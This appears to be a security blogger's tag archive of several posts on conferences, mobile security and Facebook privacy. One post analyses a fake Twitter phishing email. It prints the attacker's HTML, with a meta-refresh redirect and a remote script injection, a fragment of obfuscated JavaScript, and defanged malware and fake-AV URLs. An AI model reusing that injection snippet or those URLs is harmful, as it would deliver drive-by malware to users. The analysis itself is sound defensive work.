Tag Archives: security

Free Webinar July 12th: Android vs. Apple iOS Security Showdown

0
Filed under Android, Apple, Mobile Applications, Mobile Security
Tagged as , , , , ,

It’s not too late to register for my webinar on July 12th: Android vs. Apple iOS Security Showdown.  I’ll be taking a entertaining look at the current security posture of both platforms. I’ll be battling the Apple App Store vs. Google Play, device updates, MDMs, developer controls, security features and the current slew of vulnerabilities for both platforms.  Which one will emerge the victor? Register for my webinar on July 12th to find out!

Are We Reaching Security Conference Overload?

2
Filed under Conferences
Tagged as , , , , ,

I saw a post from my friend Matt Neely on Twitter about how CarolinaCon and BSidesROC are on the same weekend this year. I’ve also had conversations with others earlier this week about DerbyCon (September 28-30) and GrrCon (September 27-28) being back to back as well. This is a trend that seems to be increasing every year based on the large pool of conferences out there. Not only do we have more security and hacking conferences then ever before but now there is more overlap with each other. My thought is that these choices can make it harder for researchers to present new and relevant content and also tough to decide which conferences to attend from a attendee perspective. DerbyCon was an excellent conference but I’ve also heard great things about GrrCon as well. Which conference would a speaker or attendee choose? They are also both located in the central part of the country and near large cities which makes it even more difficult for local folks to choose.

On the other hand because of Security BSides and other smaller conferences over the years more unknown speakers are getting out there. We’re also seeing more great talks and discussions then ever before because of these smaller conferences. This is a good thing for our industry. Many good talks still get rejected from the big conferences like Black Hat and this is where conferences like Security BSides really shine. However, we potentially run the risk of seeing the same speakers, same content and as Matt said we appear to have an “echo chamber problem” at all of these conferences including the big ones. Is anyone else seeing this trend? Does the overlap of multiple security conferences matter to you? Like any trend in technology are we about to bust the “Security Conference Bubble”? I often wonder what the security conference world will look like in a few years if this trend continues.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

SANS Mobile Device Security Summit Recap

2
Filed under Mobile Security
Tagged as , , , , , , , , ,

Just a quick post about the SANS Mobile Device Security Summit that I participated in.  Kudos to Kevin Johnson and Tony DeLaGrange from Secure Ideas for helping organize and lead the event.  They did a great job!  If you’ve been to SANS events in the past I assure you that this was much different.  First, there was a great line up which included Rafal Los (HP), Jack Mannino (nVisium Security), Chris Cuevas (Secure Ideas), John Sawyer (InGuardians), Josh Feinblum (The Advisory Board Company) and Daniel Miessler (HP ShadowLabs) to name a few.  Having a lineup of great speakers really made the summit flow as well as it did.

What I liked most about this event was that there were plenty of “real world” talks on how enterprises are deploying and managing mobile deployments.  Real in the “trenches” types of talks.  Here are some of the themes that I heard throughout all the talks:

  • Jailbreaking/Rooting is BAD
  • The OWASP Mobile Top 10 is going to be just as important as the traditional web application OWASP Top 10
  • Mobile Threats are an evolving, moving target.  Security teams have to be quick to adapt to new mobile technology
  • MDM (Mobile Device Management Solutions) are a requirement
  • Apple iOS devices are preferred over Android in the enterprise (seriously, that was the consensus).  No one seems to care about BlackBerry or Windows Mobile devices.  I think only one speaker mentioned Windows Mobile…

Speaking to the last point I find this pretty interesting.  Especially given the fact that Android seems to be beating Apple in regards to market share of devices and app store apps.  I also enjoyed hearing about some of the challenges and pitfalls real IT and security departments are facing.  Many of the speakers talked about some best practices they’ve developed and problems they’ve had.  One of the highlights for me was a talk by Det. Cindy Murphy from the Madison WI Police Department Computer Forensics Unit.  She shared some of her experiences with mobile device forensics and how this evidence holds up in court.  I highly recommend you check out this summit next year, it’s one not to miss!

I should have my slides from the latest version of my talk that I gave at the summit (Attacking & Defending Apple iOS Devices in the Enterprise) in the next day or so.

 

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Speaking at the SANS Mobile Device Security Summit

1
Filed under Apple, Application Security, Mobile Security, Penetration Testing
Tagged as , , , , , ,

I’ll be presenting “Attacking and Defending Apple iOS Devices in the Enterprise” Monday, March 12 @ 10am. I’ve got a bunch of new content about iOS 5, iCloud and the latest attacks on these devices. This is the inaugural event for SANS and I’m proud to be part of it! More information can be found here at the SANS website.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Interesting New Twitter Phish Can Lead to Bad Places

0
Filed under Malware, Social Networks
Tagged as , , , ,

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. :-) Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/['ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404’s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

The Story of a Security Guy at the Marketing Conference

2
Filed under General Security, Social Networks
Tagged as , , , , , , ,

Last week I was asked by some of my social media acquaintances to be a panelist on a end of the day keynote at the Online Marketing Summit (OMS) held in Cleveland, OH.  The first thing you are probably wondering is “What the hell is a security guy doing at a marketing conference”?  Let me explain.  This isn’t the first time I have done something like this and it probably won’t be the last.  Read on.

In many companies the marketing, public relations, HR and other “business” functions really don’t want anything to do with security.  It’s true.  We always get in the way by stopping money making and/or great marketing ideas with phrases like “If you do that…the hax0rs are going to pwn us!” or “No you can’t, that’s against our security policy.  Go away now.”  Unfortunately, all it takes is one bad experience from the “security people” and they won’t want to work with you ever again.  I’ve seen it happen many times and I’ve even been “that evil security guy” at various times in my career.

It’s because of this bull headed attitude that these departments start finding ways around your policies, procedures, website blocking and more.  Why? Because security people are increasingly impossible to deal with.  Too much red tape, policies, rules and most of all…lack of communication.  That’s right, I said it.  Lack of good communication.  When was the last time you talked to these people in your company?  When was the last time you offered to help them with a compromise or solution rather then saying no?  This might be a shock to some of you but these are the people helping make the business money.  All of us in security are just an extra expense to the business.  Don’t make our jobs harder!  Here are three steps to help communicate to these people better:

1. Get out of your shell
We love to hang out and network at security conferences and user groups.  It makes sense because we are comfortable around our own people.  However, take a step back and think about what the “business needs” for a minute.  You are there to help the business succeed.  So go out and help them!  One way to do this is to attend a marketing conference.  Seriously.  You get to meet and talk to people that want to help the business make money and know how to do it.  You also get to learn what the business wants.  This will get you thinking about how you as the “security person” can help make that happen while keeping the business and its information safe.

2. Learn something new
What does marketing have to do with security?  All kinds of things!  SEO, blogging, social networking, social media, brand reputation, monitoring and more.  These are hot topics right now and there are serious security and privacy issues to be concidered.  You need to be involved!  The best way to do this is to attend their conferences, read their blogs and communicate.  One good way to get involved is to look for a local social media club in your area.  We have a great one in Cleveland and there are others in cities all over the US and probably the world.  Attend, learn and network.  It can only benefit you and your company.  Same goes if you are a consultant.  Meeting marketing people is a great way to get new business because they usually have a direct line to upper management at a company.  They will also be so impressed that a security person actually took the time to show up to a marketing conference…they might call upper management for you. :)

3. Teach and Educate
We have all “beaten the horse to death” regarding security awareness.  Many in security say it doesn’t work and is a hopeless battle.  While there is no patch for human stupidity, you still need to make an effort.  If anything, by you as the “security person” showing up at the marketing departments monthly meeting it shows that security wants to be involved with what they are doing.  This alone says volumes!  Especially to management of those groups.  Get out there and explain why you have certain policies, how the security team functions or better yet…how you can help them market the business and do it securely.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

My Thoughts on the New Facebook Privacy Controls

0
Filed under Privacy on the Internetz, Social Networks
Tagged as , , , ,

Ever since I started the Facebook Privacy & Security Guide back in October 2008 I knew that Facebook’s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been in Facebook’s financial interest to *really* show you how to protect the information you post.  These are all reasons was why I started the guide and hopefully over the last few years it has helped spread some awareness on how to control the information you post a little better.  Working on the guide has been frustrating at times because Facebook would make settings more confusing, remove settings that were useful and then bring them back again in some other form.  In the latest versions of the guide I often wondered how I was going to fit all the settings and their explanations into a two-sided handout.  The handout format has always been important to me so it could be easily distributed. :-)

Jumping forward to today we see yet another iteration of these settings.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  The EFF has a good post up about the new settings.  They even have a YouTube video showing you the changes and their recommendations.  The other post you should read is one by theharmonyguy who, as always, has very good analysis of these settings and Facebook overall.

My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for Forbes regarding statements that “Privacy is Dead”:

“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Notacon 7 – Things to Do and Talks to Attend

1
Filed under Cleveland, Hacking
Tagged as , , , , , , ,

The con that is Notacon is upon us. Notacon is one of the best con’s I have ever attended!  It’s a great mix of hacking, security, art, technology and everything in between.  It’s also small enough to network with others…oh, and its in Cleveland which means its affordable!  Things get started tonight with a free preview beginning at 7pm! Some of the speakers will be giving previews of their talks so go check it out if you can.

Just like previous years, there are some really cool events you need to attend including Whose Slide is it Anyway, the Friday night experience and Blockparty!  This year the lock picking village is sponsored by Cleveland Locksport and be sure to check out Deviant Ollam’s new challenge the Defiant Box. Security Justice will also have a live show at 11pm Friday night in the Notacon Radio room. As for talks, this years lineup looks great!  Here are my picks of talks to attend this year:

Friday
Mick Douglas (from PaulDotCom Security Weekly) – U R Doin it Wrong Info Disclosure over P2P Networks
Tiffany Rad – Hacking Your Car: Reverse Engineering Protocols, Legalities and the Right to Repair Act
Brad Smith – Stealing from God!
Emily Schooley – Independent Filmmaking – Bringing Your Ideas from Paper to the Screen, and Everything in Between
Nicolle “rogueclown” Neulist – Hey, Don’t Call That Guy A Noob: Toward a More Welcoming Hacker Community
int eighty – Malicious PDF Analysis
catfood – Why Your Software Project Sucks (and how to make it not suck)
Dead Addict – Hidden Trust relationships, an exploration
Jeff “ghostnomad” Kirsch – The Haiku of Security: Complexity through Simplicity
David Kennedy (rel1k) – The Social-Engineering Toolkit (SET) – Putting cool back into SE

Saturday
Adrian Crenshaw (IronGeek) – Anti-forensics
James Arlen, Chris Clymer, Mick Douglas, and Brandon Knight – Social Engineering Security Into Your Business
James Arlen, Leigh Honeywell, Tiffany Rad and Jillian Loslo – Hacking The Future: Weaponizing the Next Generation
Melissa Barron – Hacking 73H 0r3g0n 7r41L for the Apple ][
Tom Eston, Chris Clymer, Matthew Neely, The Confused Greenies – Surviving the Zombie Apocalypse (did you see our preview?)
James Arlen – SCADA and ICS for Security Experts: How to avoid cyberdouchery
Eleanor Saitta – Designing the Future of Sex

Also on Saturday night don’t miss Dual Core at 8pm!  I’ll be around at the con hanging out so if you see me stop and say Hi.  See you there!

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

New Facebook Privacy Settings: For Better or For Worse?

8
Filed under Privacy on the Internetz, Social Networks
Tagged as , , , , , , , , ,

Everyone has probably already heard that Facebook rolled out new privacy settings today.  If you haven’t seen them or gotten the following pop-up box on login…you will soon:

message1

There are a great deal of articles already out about how this is such a great improvement and how these new settings give you more control over your privacy.  However, I would argue that these settings may possibly open up more issues then they are trying to prevent.  The best article on the new settings and the privacy implications is the one that the Electronic Frontier Foundation (EFF) released today titled: Facebook’s New Privacy Changes: The Good, The Bad, and The Ugly.  I recommend everyone (no pun intended) read this article as it provides much more detail then I will provide in this post.

What I want to do is provide you with a summary of the good and the bad of the new privacy settings.  I also want to give a security professional’s point of view on these settings.  As a penetration tester I can tell you that my job just got way easier!  You may have read my series on Enterprise Open Source Intelligence Gathering in which I tell you how you can find information on social networks about your company and employees.  Well, searching for information on Facebook just got easier thanks to status updates being available using new technology like Google Real-time Search!  Ok, on to the better and the worse!

The Better?

  • The new way privacy settings are “managed” is a good thing.  It’s easier to find and navigate through the settings.
  • I like that they ask you for your password to change privacy settings.  It’s just another layer.  Now, this doesn’t help much if you have a keylogger installed but it seems they put this in to prevent bots that may have taken over your account access to your settings.  Again, not fool proof but another layer.
  • The ability to fully customize privacy settings on all the content you post.  So for example, you can specify if you want everyone on the Internet to view your status updates (more on that in a minute) or Friends, Friends of Friends and Custom.
  • Users are now somewhat “forced” to check out their privacy settings.  It’s more accessible that’s for sure.

The Worse?

  • Your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages are all available to be viewed by EVERYONE on Facebook! You cannot change these settings at all.  Note, there is a way to remove your entire Friends List from your profile but it’s all or nothing!  Here is a screen shot of this. You have to set it in your profile page using the “edit” button and check the box.These changes are quite disturbing considering that you used to be able to restrict this type of information.  I really believe that Facebook has done this on purpose so *more* information is being shared about you while stating “enhanced” more granular privacy settings.  If you have been to one of my talks in the past I always mention that social networks need to find ways to make money.  The way they make money is off of the information you share!  If you don’t get a choice about the basic information anymore…that’s more money in their pocket at the expense of your privacy.
  • What about the security ramifications of this? It opens up a whole new world for cyberstalking, predators and other attackers.  If you were someone that didn’t feel comfortable sharing this information in the first place, your choice is gone.  Sure, you can lock down your profile so no one can search for you but if you do that…why are you on Facebook to begin with?  You *have* to let your real friends search for you at some point!
  • By default Facebook “suggests” that you set your status updates to “Everyone”.  Here is the thing with status updates….Everyone means everyone on the Internet!  This is where new technology like Google RTS comes into play.  Imagine how easy it will be to find the latest information on “Tiger Woods” or now everything YOU are saying on Facebook, Twitter and other social networks.  Enter in some social engineering and things just got easier for attackers looking to use you or your information (which is easy to figure out now that I can see your friends, and things that interest you via the pages your a fan of).
  • Lastly, Facebook removed the ability to prevent Facebook applications your friends installed from pulling your “public” information.  That option is now gone and applications that your friends install can now view your “public” info.  Remember kids, “public” info is now: Your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages.

One final note…be sure to double check all your privacy settings after you run the wizard.  I found a few settings that reverted back to settings I never had.  So what are your thoughts?  Will this make you lock your profile down more?  Do you care?  Is privacy dead anyway? Will Zombies destroy us all? :-)

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

The Security Bloggers Network has Moved!

0
Filed under General Security
Tagged as ,

You may have noticed that I removed the SBN (Security Bloggers Network) badge from my blog and that the SBN Feedburner site has not been updated in several weeks. Well, Alan Shimel has officially moved SBN over to Lijit. Lijit is kind of like FriendFeed but is really more about searching, linking searches, and putting your socnets together. It should be interesting to see how Lijit will improve distribution of the SBN site content. You can check out the new SBN here. If you haven’t checked out the large list of blogs that belong to the SBN…you really should! Lot’s of great security bloggers are on the list.

Subscribe to the SBN from here via RSS or OPML.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS